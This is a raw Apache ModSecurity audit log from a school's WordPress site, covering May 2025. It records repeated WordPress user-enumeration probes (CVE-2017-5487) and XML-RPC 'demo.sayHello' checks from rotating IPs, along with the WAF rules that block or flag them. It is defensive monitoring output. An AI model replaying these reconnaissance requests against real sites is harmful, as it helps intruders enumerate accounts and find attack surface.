[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427396869520 5139 (- - -) Stopwatch2: 1747427396869520 5139; combined=3886, p1=487, p2=3186, p3=30, p4=32, p5=90, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43204047-Z-- --d74d4164-A-- [17/May/2025:03:30:42 +0700] aCegcnyxdQCiyU1ENFchMAAAAAA 103.236.140.4 55192 103.236.140.4 8181 --d74d4164-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d74d4164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74d4164-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427442143344 8214 (- - -) Stopwatch2: 1747427442143344 8214; combined=1875, p1=861, p2=983, p3=0, p4=0, p5=31, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74d4164-Z-- --cb371458-A-- [17/May/2025:03:30:49 +0700] aCegeXyxdQCiyU1ENFchNAAAAAU 103.236.140.4 55202 103.236.140.4 8181 --cb371458-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb371458-C-- demo.sayHello --cb371458-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb371458-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427449434636 4599 (- - -) Stopwatch2: 1747427449434636 4599; combined=3015, p1=443, p2=2408, p3=22, p4=25, p5=71, sr=56, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb371458-Z-- --bbe19b08-A-- [17/May/2025:03:31:35 +0700] aCegp3yxdQCiyU1ENFchQAAAAAQ 103.236.140.4 55244 103.236.140.4 8181 --bbe19b08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbe19b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe19b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427495966311 2886 (- - -) Stopwatch2: 1747427495966311 2886; combined=1251, p1=437, p2=784, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe19b08-Z-- --64ff3b22-A-- [17/May/2025:03:31:36 +0700] aCegqHyxdQCiyU1ENFchQQAAAAU 103.236.140.4 55246 103.236.140.4 8181 --64ff3b22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64ff3b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64ff3b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427496307315 2820 (- - -) Stopwatch2: 1747427496307315 2820; combined=1229, p1=426, p2=774, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64ff3b22-Z-- --863a5b5f-A-- [17/May/2025:03:31:39 +0700] aCegq3yxdQCiyU1ENFchQwAAAAg 103.236.140.4 55252 103.236.140.4 8181 --863a5b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --863a5b5f-C-- demo.sayHello --863a5b5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --863a5b5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427499045493 5797 (- - -) Stopwatch2: 1747427499045493 5797; combined=4177, p1=553, p2=3388, p3=33, p4=31, p5=100, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863a5b5f-Z-- --d940425e-A-- [17/May/2025:03:31:41 +0700] aCegrXyxdQCiyU1ENFchRAAAAAk 103.236.140.4 55254 103.236.140.4 8181 --d940425e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d940425e-C-- demo.sayHello --d940425e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d940425e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427501232342 6238 (- - -) Stopwatch2: 1747427501232342 6238; combined=4552, p1=660, p2=3593, p3=34, p4=34, p5=130, sr=192, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d940425e-Z-- --fcd2a52c-A-- [17/May/2025:03:32:17 +0700] aCeg0XyxdQCiyU1ENFchSQAAABI 103.236.140.4 55272 103.236.140.4 8181 --fcd2a52c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fcd2a52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcd2a52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427537625970 3639 (- - -) Stopwatch2: 1747427537625970 3639; combined=1505, p1=533, p2=940, p3=0, p4=0, p5=32, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcd2a52c-Z-- --76d37a40-A-- [17/May/2025:03:32:21 +0700] aCeg1XyxdQCiyU1ENFchSwAAABU 103.236.140.4 55276 103.236.140.4 8181 --76d37a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76d37a40-C-- demo.sayHello --76d37a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d37a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427541884032 6042 (- - -) Stopwatch2: 1747427541884032 6042; combined=4403, p1=567, p2=3617, p3=30, p4=37, p5=91, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d37a40-Z-- --58f0e33d-A-- [17/May/2025:03:32:39 +0700] aCeg53yxdQCiyU1ENFchTQAAABc 103.236.140.4 55280 103.236.140.4 8181 --58f0e33d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58f0e33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58f0e33d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427559702489 3301 (- - -) Stopwatch2: 1747427559702489 3301; combined=1333, p1=474, p2=831, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58f0e33d-Z-- --5b76a031-A-- [17/May/2025:03:32:39 +0700] aCeg5wTOsBn9MSWb6WJpuwAAAIw 103.236.140.4 55282 103.236.140.4 8181 --5b76a031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b76a031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b76a031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427559702785 3190 (- - -) Stopwatch2: 1747427559702785 3190; combined=1279, p1=414, p2=837, p3=0, p4=0, p5=27, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b76a031-Z-- --b33f8b1d-A-- [17/May/2025:03:32:45 +0700] aCeg7XyxdQCiyU1ENFchUAAAAAI 103.236.140.4 55288 103.236.140.4 8181 --b33f8b1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b33f8b1d-C-- demo.sayHello --b33f8b1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b33f8b1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427565124352 5275 (- - -) Stopwatch2: 1747427565124352 5275; combined=3995, p1=495, p2=3119, p3=25, p4=23, p5=179, sr=78, sw=154, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b33f8b1d-Z-- --fbb6b75a-A-- [17/May/2025:03:32:45 +0700] aCeg7XyxdQCiyU1ENFchUQAAAAM 103.236.140.4 55290 103.236.140.4 8181 --fbb6b75a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fbb6b75a-C-- demo.sayHello --fbb6b75a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb6b75a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427565135006 4847 (- - -) Stopwatch2: 1747427565135006 4847; combined=3834, p1=488, p2=3146, p3=23, p4=25, p5=89, sr=95, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb6b75a-Z-- --dc31834b-A-- [17/May/2025:03:32:51 +0700] aCeg8wTOsBn9MSWb6WJpvQAAAI4 103.236.140.4 55296 103.236.140.4 8181 --dc31834b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dc31834b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc31834b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427571197409 2747 (- - -) Stopwatch2: 1747427571197409 2747; combined=1166, p1=398, p2=735, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc31834b-Z-- --89449104-A-- [17/May/2025:03:32:57 +0700] aCeg-QTOsBn9MSWb6WJpvwAAAJA 103.236.140.4 55300 103.236.140.4 8181 --89449104-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89449104-C-- demo.sayHello --89449104-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89449104-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427577074668 6582 (- - -) Stopwatch2: 1747427577074668 6582; combined=4552, p1=647, p2=3658, p3=31, p4=34, p5=105, sr=89, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89449104-Z-- --e990db5d-A-- [17/May/2025:03:33:39 +0700] aCehI3yxdQCiyU1ENFchUwAAAAY 103.236.140.4 55304 103.236.140.4 8181 --e990db5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e990db5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e990db5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427619370370 3024 (- - -) Stopwatch2: 1747427619370370 3024; combined=1274, p1=427, p2=818, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e990db5d-Z-- --a4727766-A-- [17/May/2025:03:33:45 +0700] aCehKXyxdQCiyU1ENFchVQAAAAk 103.236.140.4 55308 103.236.140.4 8181 --a4727766-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a4727766-C-- demo.sayHello --a4727766-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4727766-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427625569279 5820 (- - -) Stopwatch2: 1747427625569279 5820; combined=4272, p1=488, p2=3521, p3=30, p4=31, p5=115, sr=71, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4727766-Z-- --bbe19b08-A-- [17/May/2025:03:34:46 +0700] aCehZgTOsBn9MSWb6WJpwwAAAJc 103.236.140.4 55318 103.236.140.4 8181 --bbe19b08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbe19b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe19b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 